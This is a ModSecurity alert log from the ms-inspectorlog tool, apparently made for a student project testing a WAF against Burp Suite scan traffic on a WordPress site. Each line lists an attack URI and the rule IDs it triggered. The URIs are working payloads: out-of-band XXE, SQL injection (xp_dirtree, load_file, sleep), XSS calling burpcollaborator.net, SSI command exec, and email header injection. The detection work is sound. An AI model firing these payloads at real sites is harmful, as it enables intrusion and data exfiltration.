# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l burpsuite.short -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/ficheros_uris_completos/web_dinamica/modsecurity/burpsuite_short.clean
Packet [16]	Uri [/(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20ierzp%20SYSTEM%20%22http%3a//s4xkc41hqz3m7e9firdhjpfb92f03trwft2jq8.burpcollab'%7c%7c'orator.net/%22%3e%25ierzp%3b]%3e')%2c'/l')%20from%20dual)/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [17]	Uri [/(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20qiiph%20SYSTEM%20%22http%3a//80608kxxmfz23u5ve79xf5br5ibgzbnebby1mq.burpcollab'%7c%7c'orator.net/%22%3e%25qiiph%3b]%3e')%2c'/l')%20from%20dual)/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [18]	Uri [/(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20vjlkj%20SYSTEM%20%22http%3a//6z6y7iwvldy02s4td58ve3ap4gaey9mca9xzlo.burpcollab'%7c%7c'orator.net/%22%3e%25vjlkj%3b]%3e')%2c'/l')%20from%20dual)/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [19]	Uri [/(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20wdntm%20SYSTEM%20%22http%3a//k7scfw49tr6ea6c7ljg9mhi3cuis6tuwit5jt8.burpcollab'%7c%7c'orator.net/%22%3e%25wdntm%3b]%3e')%2c'/l')%20from%20dual)/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [50]	Uri [/robots.txt?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2f0z0s7cwpl7yu2m4ndz8pexaj4aa7yzmrcf62wql%5c.burpcollaborator.net%60%3e=1]	Nattacks [7 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942490]	[942431]
Packet [51]	Uri [/robots.txt?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2f165ted3qs85v9nbok0fqlyhkbbh955txjld83ws%5c.burpcollaborator.net%60%3e=1]	Nattacks [7 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942490]	[942431]
Packet [52]	Uri [/robots.txt?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2f5gmxohdu2cfzjrlsu4puv2rolfrbf23utin5dt2%5c.burpcollaborator.net%60%3e=1]	Nattacks [7 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942490]	[942431]
Packet [53]	Uri [/robots.txt?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2ft0ul85xim0zn3f5ges9ifqbc53b0zsnkd87vxjm%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [54]	Uri [/robots.txt?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fwrroz8old3qquiwj5v0l6t2fw624q0es4gy3ord%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [58]	Uri [/robots.txt?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f1fhtndcq18evinkot0oquyqkkbq8e02stgn3dr2X%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [59]	Uri [/robots.txt?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fpjchr1ge5wijmbocxoseymu8ozuxit6lx9rwhk6X%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [60]	Uri [/robots.txt?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fymoquajn85lspkrl0xvn1vxhr8x4lv9n0buykm9X%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [67]	Uri [/trace.axd]	Nattacks [1 ]	Signatures	[920440]
Packet [73]	Uri [/web'%2b(select*from(select(sleep(20)))a)%2b'/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [1 ]	Signatures	[933161]
Packet [75]	Uri [/web'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20ierzp%20SYSTEM%20%22http%3a//367vef3ssa5x9pbqk2fsl0hmbdhb54t8h54vsk.burpcollab'%7c%7c'orator.net/%22%3e%25ierzp%3b]%3e')%2c'/l')%20from%20dual)%7c%7c'/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [76]	Uri [/web'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20wdntm%20SYSTEM%20%22http%3a//cfv4noc11je6iykztbo1u9qvkmqkel2pqmdc11.burpcollab'%7c%7c'orator.net/%22%3e%25wdntm%3b]%3e')%2c'/l')%20from%20dual)%7c%7c'/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [77]	Uri [/web'(select*from(select(sleep(20)))a)'/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [1 ]	Signatures	[933161]
Packet [93]	Uri [/web/(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20hxcny%20SYSTEM%20%22http%3a//whhop8el33gqkimjvvqlwtsfm6s4g548s5fw3l.burpcollab'%7c%7c'orator.net/%22%3e%25hxcny%3b]%3e')%2c'/l')%20from%20dual)/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [94]	Uri [/web/(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20jemzr%20SYSTEM%20%22http%3a//x64pe93ms45r9jbkkwfmluhgb7h550t3h04rsg.burpcollab'%7c%7c'orator.net/%22%3e%25jemzr%3b]%3e')%2c'/l')%20from%20dual)/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [95]	Uri [/web/(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20kdpgv%20SYSTEM%20%22http%3a//pb4hj18exwajebgcpokeqmm8gzmxaqytmq9hx6.burpcollab'%7c%7c'orator.net/%22%3e%25kdpgv%3b]%3e')%2c'/l')%20from%20dual)/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [96]	Uri [/web/(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20kvtpq%20SYSTEM%20%22http%3a//qkeis2hf6xjkncpdyptfznv9p0vyjr7uvrii67.burpcollab'%7c%7c'orator.net/%22%3e%25kvtpq%3b]%3e')%2c'/l')%20from%20dual)/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [103]	Uri [/web/?%27%22%3e%3csvg%2fonload%3dfetch%60%2f%2f9w614ltyigv3zv1wa85yb67s1j7fv5jx9l38twi%5c.burpcollaborator.net%60%3e=1]	Nattacks [7 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942490]	[942431]
Packet [104]	Uri [/web/?%27%22%3e%3csvg%2fonload%3dfetch%60%2f%2fvponx7mkb2opshui3uyk4s0eu503ovcn2bwymmb%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [105]	Uri [/web/?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2f7t1z1jqwfes1wtyu762w844qyh4es5gx6l08qwf%5c.burpcollaborator.net%60%3e=1]	Nattacks [7 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942490]	[942431]
Packet [106]	Uri [/web/?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fg8p8gs55un7ab2d3mfh5ndjzdqjm7ev6lufh55u%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [107]	Uri [/web/?(select%20extractvalue(xmltype(%27%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20dkjip%20SYSTEM%20%22http%3a%2f%2f0nosvckp97muqmsn1zwp2xyjsay6mwazytlj98.burpcollab%27%7c%7c%27orator.net%2f%22%3e%25dkjip%3b]%3e%27)%2c%27%2fl%27)%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [108]	Uri [/web/?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20utwis%20SYSTEM%20%22http%3a%2f%2ffwf74rt4imv9z112ae54bc7y1p7mvdjg7au0ip.burpcollab'%7c%7c'orator.net%2f%22%3e%25utwis%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [109]	Uri [/web/?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20zsvzl%20SYSTEM%20%22http%3a%2f%2fmrhezyobdtqgu8w95l0b6j25ww2uqoer2lpbd0.burpcollab'%7c%7c'orator.net%2f%22%3e%25zsvzl%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [110]	Uri [/web/?(select%20load_file(%27%5c%5c%5c%5cdr85zpo2dkq7uzw05c026a2wwn2jq9e0goab0zp.burpcollaborator.net%5c%5ctyr%27))=1]	Nattacks [6 ]	Signatures	[942360]	[942150]	[942260]	[942310]	[942410]	[942431]
Packet [111]	Uri [/web/?1%27%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d%27%5c%5cvutn27rkg2tpxhzi8u3k9s5ez551trhi862tshh.burpcollab%27%2b%27orator.net%5csap%27%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [112]	Uri [/web/?1%27%7c%7c(select%20extractvalue(xmltype(%27%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20dkjip%20SYSTEM%20%22http%3a%2f%2fl0md8xxamszf3758ek9afib45vbrzhnlbfy5mu.burpcollab%27%7c%7c%27orator.net%2f%22%3e%25dkjip%3b]%3e%27)%2c%27%2fl%27)%20from%20dual)%7c%7c%27=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [113]	Uri [/web/?1%27)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d%27%5c%5cho99wtl6aonbr3t42gx63ez0trznndb44syfo3d.burpcollab%27%2b%27orator.net%5cdnj%27%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [114]	Uri [/web/?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d%27%5c%5c3bfvjf8sxaaxepgqp2ksq0mmgdm9azyqoei18px.burpcollab%27%2b%27orator.net%5clnk%27%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [115]	Uri [/web/?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cumkmu6jj81lopgrh0tvj1rxdr4x2lw9nzbtyjm8.burpcollab'%2b'orator.net%5czcz'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [117]	Uri [/web/?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20zsvzl%20SYSTEM%20%22http%3a%2f%2fr80jg35guy7lbddemqhgnojad1jz7tvxjr6hu6.burpcollab'%7c%7c'orator.net%2f%22%3e%25zsvzl%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [118]	Uri [/web/?1)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d%27%5c%5c6ryyziovddq0uswt550v632pwg2cq2et6h04qsf.burpcollab%27%2b%27orator.net%5cngp%27%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [123]	Uri [/web/?b2bui%7b%7b221*967%7d%7dy3xbu=1]	Nattacks [1 ]	Signatures	[941380]
Packet [126]	Uri [/web/?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d%27-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f5tzx1hqufcszwrys742u824oyf4ds5gx7l18rwgX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f%27src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [127]	Uri [/web/?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d%27-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fyfhqnacn15esikkltxonuvqhk8q4eu2mtanxdl2X%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f%27src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [128]	Uri [/web/?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f749zcj1wqe317t9ui6dwj4fq9hfd35rxilc82wrX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [129]	Uri [/web/?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fxqrpy9nmc4prtjvk4wzm5u1gv714pvdn4byyomdX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [134]	Uri [/web/?v4cre$%7b288*393%7dkul5l=1]	Nattacks [1 ]	Signatures	[932130]
Packet [146]	Uri [/web/pagina-ejemplo/?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fi6paeu37sp5c94b5khf7lfh1bshq5otgj4dr3fs%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [147]	Uri [/web/pagina-ejemplo/?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fk3ocbw09pr2e6687hjc9ihe38ues2qqih6bt1hqX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [150]	Uri [/web/wp-content%00ove4o%3ca%3ekhpdu/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [151]	Uri [/web/wp-content%00z7x9kzbb95%3e%3c/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [154]	Uri [/web/wp-content'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20kvtpq%20SYSTEM%20%22http%3a//f3j7br04pm296182hec4icey8pen2gqkeh18px.burpcollab'%7c%7c'orator.net/%22%3e%25kvtpq%3b]%3e')%2c'/l')%20from%20dual)%7c%7c'/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942101]
Packet [171]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?%22--%3e'--%3e%60--%3e%3c!--%23set%20var%3d%22bcd%22%20value%3d%22abc2jm8zxh%22--%3e%3c!--%23set%20var%3d%22def%22%20value%3d%22cde4loa1zj%22--%3e%3c!--%23echo%20var%3d%22bcd%22--%3e%3c!--%23echo%20var%3d%22def%22--%3e%3c!--%23exec%20cmd%3d%22nslookup%20-q%3dcname%20xyzp69vmk4xr1j3kcw7mdu9g3795x6lyjmd93xs.burpcollaborator.net%22%20--%3e=1]	Nattacks [9 ]	Signatures	[941160]	[941180]	[942110]	[942260]	[942300]	[942370]	[942430]	[942440]	[942431]
Packet [172]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fkl9ctwi97rkeo6q7zju90hw3quwskt8ly9swik7%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [173]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fwrroz8old3qquiwj5v0l6t2fw624q5ex4ly8owd%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [174]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?(function()%7bif(typeof%20y59xk%3d%3d%3d'undefined')%7bvar%20a%3dnew%20Date()%3bdo%7bvar%20b%3dnew%20Date()%3b%7dwhile(b-a%3c20000)%3by59xk%3d1%3b%7d%7d())=1]	Nattacks [9 ]	Signatures	[932140]	[933161]	[934100]	[942130]	[942150]	[942410]	[942430]	[942431]	[942511]
Packet [175]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20zbicu%20SYSTEM%20%22http%3a%2f%2fl9vdhx6avs8fc7e8nkiaoik4evkt8uwxkr7hv6.burpcollab'%7c%7c'orator.net%2f%22%3e%25zbicu%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [176]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?(select%20load_file('%5c%5c%5c%5cr4wjc31gqy3l7d9eiqdgjofa91fz30rrtfn2dq2.burpcollaborator.net%5c%5chmx'))=1]	Nattacks [6 ]	Signatures	[942360]	[942150]	[942260]	[942310]	[942410]	[942431]
Packet [177]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?(select*from(select(sleep(20)))a)=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [178]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%0d%0aBCC%3ao8xgg05duv7ibadbmnhdnlj7dyjw7xvpodi08ox@burpcollaborator.net%0d%0atou%3a%20t=1]	Nattacks [2 ]	Signatures	[920272]	[921150]
Packet [179]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%20and%20(select*from(select(sleep(20)))a)--%20=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942150]	[942200]	[942410]	[942440]	[942431]
Packet [180]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%20and%201694%3d1698=1]	Nattacks [1 ]	Signatures	[942400]
Packet [181]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%20and%206226%3d6229--%20=1]	Nattacks [2 ]	Signatures	[942400]	[942440]
Packet [182]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%20and%206975%3d06975--%20=1]	Nattacks [2 ]	Signatures	[942400]	[942440]
Packet [183]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%20and%208588%3d08588=1]	Nattacks [1 ]	Signatures	[942400]
Packet [184]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%20into%20outfile%20'%5c%5c%5c%5cw30ob80lp32q6i8jhvclitef86e425qwuko7ev3.burpcollaborator.net%5c%5cqjd'%3b%20--%20=1]	Nattacks [5 ]	Signatures	[942190]	[942260]	[942370]	[942480]	[942440]
Packet [185]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%20waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [186]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%22=1]	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [187]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%25%7dbqget'%2f%22%3czdky3=1]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [188]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%2b(select*from(select(sleep(20)))a)%2b=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [189]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%2c0)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [6 ]	Signatures	[942280]	[942200]	[942300]	[942440]	[942490]	[942431]
Packet [190]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5coumg20rdgvtixazb8n3d9l57zy5wtxho7c1zrng.burpcollab'%2b'orator.net%5cvsg'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [191]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1%3e%0d%0aBCC%3aaes2mmbz0hd4hwjxs9nzt7ptjkpidj1bvzpmfa4@burpcollaborator.net%0d%0axfj%3a%20h=1]	Nattacks [3 ]	Signatures	[920272]	[921150]	[942130]
Packet [193]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'%20and%20'4718'%3d'4722=1]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942400]	[942490]	[942511]
Packet [194]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'%20and%20'7737'%3d'7737=1]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942400]	[942490]	[942511]
